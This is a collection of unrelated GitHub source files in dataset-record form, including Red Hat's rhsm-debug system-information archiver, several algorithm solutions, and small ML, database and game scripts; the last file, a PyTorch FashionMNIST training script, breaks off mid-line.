   \"start_time\": \"2017-09-19 11:01:21\",\n                \"end_time\": \"2017-12-26 11:01:22\"\n            }\n        }\n        state, sql_total, result = SingleQuery(cond=cond).query_method(session, News)\n        assert state is True\n        assert sql_total == 1\n\n    def test_multi_query(self):\n        \"\"\"\n        Test for multi-table query with foreign keys\n        :return:\n        \"\"\"\n        cond = {\n            \"name\": \"\",\n            \"des\": \"\",\n            \"create_time\": {\n                \"start_time\": \"2017-09-19 11:01:21\",\n                \"end_time\": \"2017-12-26 11:01:22\"\n            }\n        }\n        response = {\n            
\"news\": [],\n            \"tag\": [],\n            \"type\": []\n        }\n        state, sql_total, result = MultiQuery(cond=cond, response=response).query_method(session, News, Tag, Type)\n        assert state is True\n        assert sql_total == 1\n\n    def test_delete(self):\n        \"\"\"\n        Test for the delete method\n        :return:\n        \"\"\"\n        item_delete = {\n            \"id\": 1\n        }\n        result_delete = DeleteOne(item_delete).delete_method(session, News)\n        assert result_delete is True\n\n    def test_delete_some(self):\n        \"\"\"\n        Test for the batch delete method\n        :return:\n        \"\"\"\n        item_delete = {\n            \"id\": [1]\n        }\n        result_delete = DeleteSome(item_delete).delete_method(session, News)\n        assert result_delete is True\n\nif __name__ == '__main__':\n    pytest.main()\n","repo_name":"silade/OrmCommand","sub_path":"app/test/TestCase.py","file_name":"TestCase.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42128953934","text":"import errno\nimport argparse\nimport os\nimport sys\nimport shutil\nimport logging\nimport tarfile\nfrom datetime import datetime\nfrom shutil import ignore_patterns\n\nimport subscription_manager.injection as inj\nfrom subscription_manager.cli_command.cli import CliCommand, handle_exception\nfrom subscription_manager.cli import InvalidCLIOptionError, system_exit\nfrom subscription_manager.certdirectory import DEFAULT_PRODUCT_CERT_DIR\nfrom rhsm import ourjson as json\nfrom rhsm.config import get_config_parser\nfrom rhsmlib.services import config\n\nfrom subscription_manager.i18n import ugettext as _\n\nlog = logging.getLogger(\"rhsm-app.\" + __name__)\n\nconf = config.Config(get_config_parser())\n\nERR_NOT_REGISTERED_MSG = _(\n    \"This system is not yet registered. Try 'subscription-manager register --help' for more information.\"\n)\nERR_NOT_REGISTERED_CODE = 1\n\nASSEMBLE_DIR = \"/var/spool/rhsm/debug\"\nROOT_READ_ONLY_DIR = 0o700\nROOT_READ_ONLY_FILE = 0o600\nKEY_IGNORE_PATS = [\"*key.pem\"]\n\n\nclass SystemCommand(CliCommand):\n    def __init__(\n        self,\n        name=\"system\",\n        shortdesc=_(\"Assemble system information as a tar file or directory\"),\n        primary=True,\n    ):\n        CliCommand.__init__(self, name=name, shortdesc=shortdesc, primary=primary)\n\n        self.parser.add_argument(\n            \"--destination\",\n            dest=\"destination\",\n            default=\"/tmp\",\n            help=_(\"the destination location of the result; default is /tmp\"),\n        )\n        # default is to build an archive, this skips the archive and clean up,\n        # just leaving the directory of debug info for sosreport to report\n        self.parser.add_argument(\n            \"--no-archive\",\n            action=\"store_false\",\n            default=True,\n            dest=\"archive\",\n            help=_(\"data will be in an uncompressed directory\"),\n        )\n        self.parser.add_argument(\n            \"--sos\",\n            action=\"store_true\",\n            default=False,\n            dest=\"sos\",\n            help=_(\"only data not already included in sos report will be collected\"),\n        )\n        # These options don't do anything anymore, since current versions of\n        # the RHSM API don't support them, and previously they failed silently.\n        # So now they are hidden, and they are not hooked up to anything. This\n        # avoids breaking existing scripts, since it also didn't do anything\n        # before. 
See rhbz #1246680\n self.parser.add_argument(\n \"--no-subscriptions\",\n action=\"store_true\",\n dest=\"placeholder_for_subscriptions_option\",\n default=False,\n help=argparse.SUPPRESS,\n )\n self.parser.add_argument(\n \"--subscriptions\",\n action=\"store_true\",\n dest=\"placeholder_for_subscriptions_option\",\n default=False,\n help=argparse.SUPPRESS,\n )\n\n self.assemble_path = ASSEMBLE_DIR\n\n # so we can track the path of the archive for tests.\n self.final_destination_path = None\n\n def _get_usage(self):\n return _(\"%(prog)s {name} [OPTIONS] \").format(name=self.name)\n\n def _validate_options(self):\n if self.options.destination and not os.path.exists(self.options.destination):\n raise InvalidCLIOptionError(_(\"The directory specified by '--destination' must already exist.\"))\n # no archive, check if we can safely copy to dest.\n if not self.options.archive:\n if not self._dirs_on_same_device(self.assemble_path, self.options.destination):\n msg = _(\n \"To use the no-archive option, the destination directory '{destination}' \"\n \"must exist on the same file system as the \"\n \"data assembly directory '{assembly}'.\"\n ).format(destination=self.options.destination, assembly=self.assemble_path)\n raise InvalidCLIOptionError(msg)\n # In case folks are using this in a script\n if self.options.placeholder_for_subscriptions_option:\n log.debug(\"The rhsm-debug options '--subscriptions' and '--no-subscriptions' have no effect now.\")\n\n def _dirs_on_same_device(self, dir1, dir2):\n return os.stat(dir1).st_dev == os.stat(dir2).st_dev\n\n def _do_command(self):\n self.options.destination = os.path.expanduser(self.options.destination)\n self._validate_options()\n consumer = inj.require(inj.IDENTITY)\n if not consumer.is_valid():\n system_exit(ERR_NOT_REGISTERED_CODE, ERR_NOT_REGISTERED_MSG)\n\n code = self._make_code()\n archive_name = \"rhsm-debug-system-%s\" % code\n tar_file_name = \"%s.tar.gz\" % archive_name\n # /var/spool/rhsm/debug/rhsm-debug-system-20131212-121234/\n content_path = os.path.join(self.assemble_path, archive_name)\n # /var/spool/rhsm/debug/rhsm-debug-system-20131212-123413.tar.gz\n tar_file_path = os.path.join(self.assemble_path, tar_file_name)\n\n try:\n # assemble path is in the package, so should always exist\n self._makedir(content_path)\n\n owner = self.cp.getOwner(consumer.uuid)\n\n self._write_flat_file(content_path, \"consumer.json\", self.cp.getConsumer(consumer.uuid))\n self._write_flat_file(content_path, \"compliance.json\", self.cp.getCompliance(consumer.uuid))\n self._write_flat_file(\n content_path, \"entitlements.json\", self.cp.getEntitlementList(consumer.uuid)\n )\n self._write_flat_file(\n content_path, \"pools.json\", self.cp.getPoolsList(consumer.uuid, True, None, owner[\"key\"])\n )\n self._write_flat_file(content_path, \"version.json\", self._get_version_info())\n\n # FIXME: we need to anon proxy passwords?\n sos = self.options.sos\n defaults = conf.defaults()\n # sosreport collects /etc/rhsm/* and /var/*/rhsm/*, so these would\n # be redundant for sos\n if not sos:\n # copy rhsm.conf specifically\n self._copy_cert_directory(\"/etc/rhsm\", content_path)\n self._copy_directory(\"/var/log/rhsm\", content_path)\n self._copy_directory(\"/var/lib/rhsm\", content_path)\n\n if not sos:\n self._copy_cert_directory(DEFAULT_PRODUCT_CERT_DIR, content_path)\n\n if defaults[\"productcertdir\"] != conf[\"rhsm\"][\"productCertDir\"] or not sos:\n self._copy_cert_directory(conf[\"rhsm\"][\"productCertDir\"], content_path)\n\n if 
defaults[\"entitlementcertdir\"] != conf[\"rhsm\"][\"entitlementCertDir\"] or not sos:\n                self._copy_cert_directory(conf[\"rhsm\"][\"entitlementCertDir\"], content_path)\n\n            if defaults[\"consumercertdir\"] != conf[\"rhsm\"][\"consumerCertDir\"] or not sos:\n                self._copy_cert_directory(conf[\"rhsm\"][\"consumerCertDir\"], content_path)\n\n            # If ca_cert_dir and pluginconfdir are configured as subdirs of /etc/rhsm\n            # (as is the default) we will have already copied their contents,\n            # so ignore directory exists errors\n            try:\n                if defaults[\"ca_cert_dir\"] != conf[\"rhsm\"][\"ca_cert_dir\"] or not sos:\n                    self._copy_cert_directory(conf[\"rhsm\"][\"ca_cert_dir\"], content_path)\n            except EnvironmentError as e:\n                if e.errno != errno.EEXIST:\n                    raise\n\n            try:\n                if defaults[\"pluginconfdir\"] != conf[\"rhsm\"][\"pluginconfdir\"] or not sos:\n                    self._copy_directory(conf[\"rhsm\"][\"pluginconfdir\"], content_path)\n            except EnvironmentError as e:\n                if e.errno != errno.EEXIST:\n                    raise\n\n            # build an archive by default\n            if self.options.archive:\n                # open the tarfile outside the try block so a failed open\n                # cannot leave 'tf' unbound in the finally clause\n                tf = tarfile.open(tar_file_path, \"w:gz\")\n                try:\n                    tf.add(content_path, archive_name)\n                finally:\n                    tf.close()\n\n                final_path = os.path.join(self.options.destination, \"rhsm-debug-system-%s.tar.gz\" % code)\n\n                self.final_destination_path = final_path\n\n                sfm = SaferFileMove()\n                sfm.move(tar_file_path, final_path)\n                print(_(\"Wrote: {final_path}\").format(final_path=final_path))\n            else:\n                # NOTE: this will fail across filesystems. We could add a force\n                # flag to force creation of a specific name with appropriate\n                # warnings.\n                dest_dir_name = os.path.join(self.options.destination, archive_name)\n\n                # create the dest dir, and set its perms, this is atomic-ish\n                self._makedir(dest_dir_name)\n\n                # try to rename the dir atomically\n                # rename only works on the same filesystem, but it is atomic.\n                os.rename(content_path, dest_dir_name)\n\n                print(_(\"Wrote: {destination_dir_name}\").format(destination_dir_name=dest_dir_name))\n\n        except Exception as e:\n            handle_exception(_(\"Unable to create zip file of system information: {error}\").format(error=e), e)\n            sys.exit(os.EX_SOFTWARE)\n        finally:\n            if content_path and os.path.isdir(content_path):\n                shutil.rmtree(content_path, True)\n\n    def _make_code(self):\n        return datetime.now().strftime(\"%Y%m%d-%f\")\n\n    def _get_version_info(self):\n        return {\n            \"server type\": self.server_versions[\"server-type\"],\n            \"subscription management server\": self.server_versions[\"candlepin\"],\n            \"subscription-manager\": self.client_versions[\"subscription-manager\"],\n        }\n\n    def _write_flat_file(self, content_path, filename, content):\n        path = os.path.join(content_path, filename)\n        with open(path, \"w+\") as fo:\n            fo.write(json.dumps(content, indent=4, sort_keys=True, default=json.encode))\n\n    def _copy_directory(self, src_path, dest_path, ignore_pats=[]):\n        rel_path = src_path\n        if os.path.isabs(src_path):\n            rel_path = src_path[1:]\n        if ignore_pats is not None:\n            shutil.copytree(src_path, os.path.join(dest_path, rel_path), ignore=ignore_patterns(*ignore_pats))\n        else:\n            shutil.copytree(src_path, os.path.join(dest_path, rel_path))\n\n    def _copy_cert_directory(self, src_path, dest_path):\n        self._copy_directory(src_path, dest_path, KEY_IGNORE_PATS)\n\n    def _makedir(self, dest_dir_name):\n        os.makedirs(dest_dir_name, ROOT_READ_ONLY_DIR)\n\n\nclass SaferFileMove:\n    \"\"\"Try to copy a file avoiding race conditions.\n\n    Opens the dest file os.O_RDWR | os.O_CREAT | os.O_EXCL, which\n    guarantees that the file didn't exist before, that we created 
it,\n    and that we are the only process that has it open. We also make sure\n    the perms are so that only root can read the result.\n\n    Then we copy the contents of the src file to the new dest file,\n    and unlink the src file.\"\"\"\n\n    def __init__(self):\n        # based on shutils copyfileob\n        self.buf_size = 16 * 1024\n        # only root can read\n        self.default_perms = ROOT_READ_ONLY_FILE\n\n    def move(self, src, dest):\n        \"\"\"Move a file to a dest dir, potentially /tmp more safely.\n\n        If dest is /tmp, or a specific name in /tmp, we want to\n        create it excl if we can.\"\"\"\n        with open(src, \"rb\") as src_fo:\n            # if dest doesn't exist, and we can open it excl, then open it,\n            # keep the fd, create a file object for it, and write to it\n            with self._open_excl(dest) as dest_fo:\n                self._copyfileobj(src_fo, dest_fo)\n\n        os.unlink(src)\n\n    def _open_excl(self, path):\n        \"\"\"Return a file object that we know we created and nothing else owns.\"\"\"\n        return os.fdopen(os.open(path, os.O_RDWR | os.O_CREAT | os.O_EXCL, self.default_perms), \"wb+\")\n\n    def _copyfileobj(self, src_fo, dest_fo):\n        while True:\n            buf = src_fo.read(self.buf_size)\n            if not buf:\n                break\n            dest_fo.write(buf)\n","repo_name":"candlepin/subscription-manager","sub_path":"src/rhsm_debug/debug_commands.py","file_name":"debug_commands.py","file_ext":"py","file_size_in_byte":12132,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"18"} +{"seq_id":"75234003239","text":"import sys\nimport heapq\ninput = sys.stdin.readline\n####################################################\nn, k = map(int, input().split())\n\njam = []\n\nfor _ in range(n):\n    heapq.heappush(jam, list(map(int, input().split())))\n\nbag = []\nfor _ in range(k):\n    bag.append(int(input()))\n\nbag.sort()\n####################################################\nresult = 0\n\ncan_input_jam = []\nfor max_m in bag:\n    # use a while loop here: iterating over 'jam' while popping from it would skip elements\n    while jam:\n        if jam[0][0] > max_m:\n            break\n        heapq.heappush(can_input_jam, -heapq.heappop(jam)[1])\n\n    if can_input_jam:\n        result -= heapq.heappop(can_input_jam)\n\n    elif not jam:\n        break\n\nprint(result)\n","repo_name":"Sunghyun1320/algorithm","sub_path":"python/BOJ/before_study_ssafy/num1202.py","file_name":"num1202.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33699273858","text":"# Import the necessary modules\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport numpy as np\nimport numpy.ma as ma\nimport pandas as pd\nimport sys\n\n# Read the app name from the command line\ntry:\n    app = sys.argv[1]\nexcept:\n    print('Usage: plot_bar.py <app>')\n    exit(1)\n\nmean_outlier = 50\ntry:\n    data = pd.read_csv(f\"../ufs-weather-model/{app}-prtime.csv\")\nexcept:\n    print(f\"Invalid app or .csv dataset not available for '{app}'\")\n    exit(1)\n\ndf = pd.DataFrame(data)\n\nx = list(df.iloc[:, 0])\ny = list(df.iloc[:, 2])\npr = list(df.iloc[:, 1])\n\ny_ = np.array(y)\ny_mean = np.mean(ma.masked_where(y_ > mean_outlier, y_))\nprint(y_mean)\n\nfig, ax = plt.subplots(1, 1)\nax.bar(x, y, width=0.5)\nplt.text(20, y_.max(), f\"Mean = {y_mean:.2f} days\", fontsize=8)\nax.set_xticks(x)\n# Set ticks labels for x-axis\nax.set_xticklabels(pr, rotation=60, fontsize=6)\ntick_spacing = 3\nax.xaxis.set_major_locator(ticker.MultipleLocator(tick_spacing))\nax.yaxis.set_major_locator(ticker.MultipleLocator(10))\n# Show the plot\nax.invert_xaxis()\nplt.title(f\"{app.upper()} PR Turnaround Time\")\nplt.xlabel(\"Pull 
Requests\")\nplt.ylabel(\"Days\")\nplt.tight_layout()\n\nplt.savefig(f\"../ufs-weather-model/{app}-prtime.png\")\nplt.show()\n","repo_name":"NOAA-EPIC/UFS-PR-metrics","sub_path":"script/plot_bar.py","file_name":"plot_bar.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18802710218","text":"import torch, torchvision\nimport torch.nn.functional as F\nfrom transformers import AutoProcessor, AutoModel\nfrom preprocess import JsonToDataset, MultimodalDataset, get_data_loader\n\n# paths\npaths = {\n    ## dataset & image path\n    \"train_path\": \"/kovar-vol/kovar/dataset/train.json\",\n    \"test_path\": \"/kovar-vol/kovar/dataset/test.json\",\n    \"image_path\": \"/kovar-vol/images\",\n    } \n\n# model_checkpoint = \"openai/clip-vit-base-patch32\"\nmodel_checkpoint = \"koclip/koclip-base-pt\"\nprocessor = AutoProcessor.from_pretrained(model_checkpoint)\nmodel = AutoModel.from_pretrained(model_checkpoint)\n\n\nresize_and_normalize = torchvision.transforms.Compose([\n    torchvision.transforms.Resize((224, 224)), ## reference: https://github.com/openai/CLIP/issues/248, https://github.com/openai/CLIP/issues/69\n    torchvision.transforms.ToTensor(),\n    torchvision.transforms.Normalize(mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225]), ## mean & std values are the convention computed from ImageNet.\n    torchvision.transforms.ToPILImage(), ## the CLIP model takes image input as PIL.Image, not as a tensor\n    ])\n\n\nif __name__ == \"__main__\":\n    \n    get_dataset = JsonToDataset()\n    # train_set = get_dataset(paths[\"train_path\"])\n    test_set = get_dataset(paths[\"test_path\"])\n\n    batch_size = 8\n\n    test_set = MultimodalDataset(test_set, transforms=None)\n    test_loader = get_data_loader(test_set, batch_size)\n\n    num_correct = 0\n    for batched_inputs, labels in test_loader:\n        outputs = model(**batched_inputs)\n        logits_per_image = outputs['logits_per_image']\n        \n        ## 1) get the proper outputs from the 4*12 tensor by proper indexing\n        indices = torch.arange(logits_per_image.shape[1]).reshape(batch_size,3) ## indices: torch.tensor([[0, 1, 2],[3,4,5],[6,7,8],[9,10,11]])\n        logits_per_image = torch.gather(input=logits_per_image,dim= 1, index = indices)\n\n        # print(logits_per_image)\n        \n        ## 2) convert logits_per_image outputs into one-hot form\n        one_hot_outputs = F.one_hot(logits_per_image.argmax(dim=1), num_classes=3).detach().numpy()\n        \n        ## 3) count the correct outputs by comparing to the labels\n        num_correct_in_batch = (one_hot_outputs == labels).all(axis=1).sum()\n        print(num_correct)\n        num_correct += num_correct_in_batch\n        print(num_correct_in_batch, num_correct)\n    \n    print(f'accuracy: {num_correct / len(test_set)}')\n    \n    ","repo_name":"Jongbin-kr/COSE474_Deep-Learning","sub_path":"Final-Project/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"14175374992","text":"#!/usr/bin/python3\n\"\"\"\nLists the names of cities in a specified state from\nthe 'hbtn_0e_0_usa' database.\n\"\"\"\nimport MySQLdb\nimport sys\n\nif __name__ == \"__main__\":\n    # Establish a database connection\n    db = MySQLdb.connect(\n        host=\"localhost\",\n        user=sys.argv[1],\n        passwd=sys.argv[2],\n        db=sys.argv[3],\n        port=3306\n    )\n\n    # Create a cursor\n    cur = db.cursor()\n\n    # Execute the query\n    state_name = sys.argv[4]\n    query = \"\"\"\n        SELECT cities.name\n        FROM cities\n        INNER JOIN states ON states.id = 
cities.state_id\n        WHERE states.name = %s\n    \"\"\"\n    cur.execute(query, (state_name,))\n\n    # Fetch and process results\n    rows = cur.fetchall()\n    city_names = [row[0] for row in rows]\n    print(\", \".join(city_names))\n\n    # Close the cursor and database connection\n    cur.close()\n    db.close()\n","repo_name":"yvechemtai/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/5-filter_cities.py","file_name":"5-filter_cities.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"44952455944","text":"# Project : SDE Placement Questions\n# Filename : squares_of_a_sorted_array.py\n# Author : thameem\n# Created time : Wed, 5 Jan 2022 at 11:46 PM India Standard Time\n# Last modified time : Wed, 5 Jan 2022 at 11:46 PM India Standard Time\nfrom beartype import beartype\n\n\nclass SquaresOfASortedArray:\n    @beartype\n    def __init__(self: 'SquaresOfASortedArray', nums: list[int]) -> None:\n        # conventional method\n        for index, num in enumerate(nums):\n            nums[index] = num * num\n        nums.sort()\n        self.result = nums\n\n\nif __name__ == '__main__':\n    res = SquaresOfASortedArray(nums=[-4, -1, 0, 3, 10])\n    print(res.result)\n","repo_name":"thameemk/SDE-PlacementQuestions","sub_path":"Two Pointers/Squares of a Sorted Array/squares_of_a_sorted_array.py","file_name":"squares_of_a_sorted_array.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"72160086760","text":"import random\ndef create_app(l: list):\n    s = lambda l: sorted(l)\n    l = s(l)\n\n    def append(v):\n        l.append(v)\n\n    def set_sort(sorter):\n        nonlocal s\n        s = sorter\n\n    def sort():\n        nonlocal l\n        l = s(l)\n\n    def get():\n        nonlocal l\n        return l\n\n    return append, set_sort, sort, get\n    \nappend, set_sort, sort, get = create_app([1,2,3,4])\n\nsort()\nprint(get())\n\nset_sort(lambda x: sorted(x, reverse=True))\nsort()\nprint(get())\n\nset_sort(lambda x: sorted(x, key=lambda _: random.random()))\nsort()\nprint(get())","repo_name":"istaqom/tugas-pemrograman-fungsional","sub_path":"tugas kelompok/behavioral/strategy.py","file_name":"strategy.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7962892711","text":"from typing import List\nfrom collections import defaultdict\n\n\nclass Solution:\n    def arrayChange(self, nums: List[int], operations: List[List[int]]) -> List[int]:\n        d = defaultdict(int)\n        for id, val in enumerate(nums):\n            d[val] = id\n        \n\n        for i in operations:\n            nums[d[i[0]]] = i[1]\n            d[i[1]] = d[i[0]]\n        \n        return nums","repo_name":"Mahisami/A2SV-competitive-programming-","sub_path":"leet-code-solutions/replace-elements-in-an-array.py","file_name":"replace-elements-in-an-array.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11799023532","text":"import pygame\n\n\npygame.init()\n\n\nscreen_width = 600\nscreen_height = 800\nscreen = pygame.display.set_mode((screen_width, screen_height))\n\n\npygame.display.set_caption(\"Space Raiders\")\n\n\nplayer_x = 300\nplayer_y = 700\nplayer_speed = 5\n\n\nenemy_x = 50\nenemy_y = 50\nenemy_speed = 2\n\n\nrunning = True\nwhile running:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            running = False\n\n\n    keys = pygame.key.get_pressed()\n    if keys[pygame.K_LEFT]:\n        player_x -= player_speed\n    if keys[pygame.K_RIGHT]:\n        player_x += 
player_speed\n\n\n    enemy_x += enemy_speed\n    if enemy_x > screen_width or enemy_x < 0:\n        enemy_speed = -enemy_speed\n\n    screen.fill((0, 0, 0))\n\n\n    pygame.draw.rect(screen, (255, 255, 255), (player_x, player_y, 50, 50))\n\n\n    pygame.draw.rect(screen, (255, 0, 0), (enemy_x, enemy_y, 50, 50))\n\n\n    pygame.display.update()\n\n\npygame.quit()\n","repo_name":"mgrady03/Marys_SpaceRaiders","sub_path":"spaceRaiders.py","file_name":"spaceRaiders.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32002911515","text":"from keras.models import load_model \r\nfrom keras.models import model_from_json \r\n\r\nimport numpy as np \r\nimport pandas as pd \r\nfrom sklearn.model_selection import train_test_split\r\n\r\n#(6)LOAD DATA FROM NUMPY(.NPZ FILE) ARRAYS\r\na_npz = np.load(\"..\\\\input\\\\a_images_arrays.npz\")\r\na = a_npz['arr_0']\r\n\r\nb_npz = np.load(\"..\\\\input\\\\b_labels.npz\")\r\nb = b_npz['arr_0'] \r\n\r\n\r\n#(7)SPLIT DATASET (70% TRAINING, 10% FOR VALIDATION AND 20% TESTING)\r\n#the dataset split ratio is handled by using the 'train_size' parameter instead of 'test_size',\r\n#since the train set will be split again into train and validation sets\r\n#First split dataset into train(80%) and test(20%) \r\nA_train, A_test, b_train, b_test = train_test_split(a, b, test_size = 0.2, random_state = 1, stratify = b)\r\n#From train, split it again into train(70%) and validation(10%) \r\nA_train, A_val, b_train, b_val = train_test_split(A_train, b_train, train_size = 0.875, random_state = 1, stratify = b_train)\r\nprint(np.array(A_train).shape)\r\nprint(np.array(A_val).shape)\r\nprint(np.array(A_test).shape)\r\n\r\n\r\nnew_model = load_model(\"modelk.h5\")\r\n\r\n\r\n#score: evaluation of a loss function in test set\r\n#force keras model to display probability by dividing image array by 255.0\r\nscore, accuracy = new_model.evaluate(A_test/255.0,\r\n\t\t\t\t b_test)\r\nprint('Test Score:', score) \r\nprint('Test Accuracy:', accuracy)\r\n\r\n#print(new_model.predict_classes(A_test))\r\n#print(new_model.predict_proba(A_test))\r\n\r\n\r\n\r\n","repo_name":"khinmaunghtay4ah/lung-chestxray-classification","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"41925920703","text":"'''\nhttps://leetcode.com/problems/number-of-1-bits/\nWrite a function that takes an unsigned integer and returns the number of '1' bits it has (also known as the Hamming weight).\nExample 1:\nInput: n = 00000000000000000000000000001011\nOutput: 3\nExplanation: The input binary string 00000000000000000000000000001011 has a total of three '1' bits.\n'''\n'''\nTime:O(1)\nSpace:O(1)\n'''\nclass Solution:\n    def hammingWeight(self, n: int) -> int:\n        res = 0\n        for i in range(32):\n            if n & 1:\n                res += 1\n            n = n>>1\n        return res\n    \nclass Solution:\n    def hammingWeight(self, n: int) -> int:\n        count = 0\n        mask = 1\n        for _ in range(32):\n            if n&mask:\n                count += 1\n            mask <<= 1\n        return count\n","repo_name":"MJJ919/My-Leetcode-Records","sub_path":"191. Number of 1 Bits.py","file_name":"191. 
Number of 1 Bits.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38921333200","text":"# -*- coding: utf-8 -*-\r\nimport yaml\r\nimport redis\r\n\r\nconfig = {\r\n    'host': '127.0.0.1',\r\n    'port': 6379,\r\n    'db': 0,\r\n    'pwd': '123456654'\r\n}\r\n\r\ndef connect(node=None):\r\n    return interRedis(node).getRds()\r\n    \r\nclass interRedis():\r\n\r\n    def __init__(self, node):\r\n        conf = getConfig(node)\r\n        self.rds = redis.Redis(conf['host'], conf['port'], conf['db'], decode_responses=True, password=conf.get('pwd'))\r\n\r\n    def getRds(self):\r\n        return self.rds\r\n\r\ndef getConfig(node):\r\n    if not node:\r\n        return config\r\n    yamlFile = open('./commLib/redis.yaml', encoding='utf8')\r\n    _conf = yaml.load(yamlFile, Loader=yaml.FullLoader)\r\n    config.update(_conf.get(node, {}))\r\n    return config\r\n\r\n# if __name__ == '__main__':\r\n#     r = connect('osu2')\r\n#     r1 = r.setex('tt',1,30)\r\n#     r1 = r.get('tt')\r\n#     print(r1)","repo_name":"huhuibin147/interbotAPI","sub_path":"commLib/interRedis.py","file_name":"interRedis.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"18"} +{"seq_id":"19407080760","text":"import sys\nsys.path.append(\"../ml_pipeline\")\n\nimport torch\nimport random\nfrom image_classes import classes\nfrom datetime import datetime\nfrom matplotlib import pyplot\nfrom torch import nn\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets \nfrom torchvision.transforms import ToTensor\nfrom device import device\nfrom neural_network import NeuralNetwork\n\n#######################################\n############### Load ##################\n#######################################\n\n# Get training data from open datasets\n# This downloads the raw data into the directory /data/FashionMNIST/raw\n# Performs a transformation on 28x28 images to Tensors\n# Automatically \ntraining_data = datasets.FashionMNIST(\n    root=\"data\", # directory where data should be downloaded to on local\n    train=True, # if True, uses training data set of 60K images, False uses 10K set of test data images\n    download=True, # if True downloads from internet, False only fetches from local\n    transform=ToTensor() # converts image data to Tensor (multi-dimensional matrix)\n)\n\n# Get test data from open datasets\ntest_data = datasets.FashionMNIST(\n    root=\"data\",\n    train=False,\n    download=True,\n    transform=ToTensor(),\n)\n\n# Utilize a data loader to iterate over datasets\nbatch_size = 128 # defines the number of samples processed per iteration\n\ntraining_dl = DataLoader(training_data, batch_size=batch_size)\ntest_dl = DataLoader(test_data, batch_size=batch_size)\n\n# print 1 batch of data for debugging\n# X: input example with dimensions [N, C, H, W]\n# N: number of samples\n# C: number of channels per image\n# H: height of image (in pixels)\n# W: width of image (in pixels)\n# y: label of sample with dimensions [N]\nfor X, y in training_dl:\n    print(f\"Shape of input example 'X' [N, C, H, W]: {X.shape}-{X.dtype}\")\n    print(f\"Shape of label example 'y' [N]: {y.shape}-{y.dtype}\")\n    break\n\n# Show what some of the images look like\nfor i in range(9):\n    # define subplot\n    pyplot.subplot(330 + 1 + i)\n    # plot raw pixel data\n    pyplot.imshow(training_data[i][0][0], cmap=pyplot.get_cmap('gray'))\n# show the figure\npyplot.show()\n\n#######################################\n############### Train 
#################\n#######################################\n\n# Get cpu, gpu or mps device for training.\nprint(f\"Using {device} device\")\n\n# Utilize a data loader to iterate over datasets\nbatch_size = 128 # defines the number of samples processed per iteration\n\ntraining_dl = DataLoader(training_data, batch_size=batch_size)\nfor X, y in training_dl:\n print(f\"Shape of input example 'X' [N, C, H, W]: {X.shape}-{X.dtype}\")\n print(f\"Shape of label example 'y' [N]: {y.shape}-{y.dtype}\")\n break\n\n# Define model using:\n# Model => NeuralNetwork\n# Loss Function => Cross Entropy Loss (see https://365datascience.com/tutorials/machine-learning-tutorials/cross-entropy-loss/)\n# Optimizer => Stochastic Gradient Descent (see https://www.geeksforgeeks.org/ml-stochastic-gradient-descent-sgd/)\n# - has a learning rate (how large of a jump to take in the direction of the gradient)\n# - backpropagation is the way in which loss is passed backwards against the gradients of the loss in the network\nmodel = NeuralNetwork().to(device)\nloss_fn = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(model.parameters(), lr=1e-2)\n\n# Run training epochs\nepochs = 10 # epoch is a full run over the data\nfor t in range(epochs):\n print(f'Epoch {t+1}\\n---------------------------')\n model.train() # sets the model to training mode\n size = len(training_dl.dataset)\n\n # Walk over training data in batches\n for batch, (X, y) in enumerate(training_dl):\n X, y = X.to(device), y.to(device)\n\n # Compute prediction error\n pred = model(X)\n loss = loss_fn(pred, y)\n\n # Backpropagation\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n\n loss, current = loss.item(), (batch + 1) * len(X)\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\n\n#######################################\n############### Test ##################\n#######################################\n\n# Load test data into DataLoader\ntest_dl = DataLoader(test_data, batch_size=batch_size)\nfor X, y in test_dl:\n print(f\"Shape of input example 'X' [N, C, H, W]: {X.shape}-{X.dtype}\")\n print(f\"Shape of label example 'y' [N]: {y.shape}-{y.dtype}\")\n break\n\nsize = len(test_dl.dataset)\nnum_batches = len(test_dl)\nmodel.eval()\nloss_fn = nn.CrossEntropyLoss()\ntest_loss, correct = 0, 0\nwith torch.no_grad():\n for X, y in test_dl:\n X, y = X.to(device), y.to(device)\n pred = model(X)\n test_loss += loss_fn(pred, y).item()\n correct += (pred.argmax(1) == y).type(torch.float).sum().item()\ntest_loss /= num_batches\ncorrect /= size\nprint(f\"Test Error: \\n 